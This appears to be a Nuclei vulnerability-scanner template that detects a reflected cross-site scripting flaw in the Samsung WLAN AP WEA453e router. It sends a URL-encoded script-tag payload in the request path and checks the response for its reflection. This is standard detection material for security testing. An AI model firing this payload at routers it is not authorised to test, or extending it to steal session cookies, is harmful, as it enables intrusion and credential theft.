40 lines
1.2 KiB
YAML
40 lines
1.2 KiB
YAML
id: samsung-wlan-ap-xss
|
|
|
|
info:
|
|
name: Samsung WLAN AP WEA453e - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: high
|
|
description: Samsung WLAN AP WEA453e router contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
max-request: 1
|
|
tags: xss,samsung
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "/tmp/www/<script>alert(document.domain)</script>"
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 404
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
# digest: 4a0a0047304502200fb046f342eb8ff6c0529d281281d561ab8fb4f2448ab7b7f09bca50e3e77f2c022100e35cf0f99110ea02c8dc39fdcf966db42cf3f8428408a523eebd434992bcf356:922c64590222798bb761d5b6d8e72950
|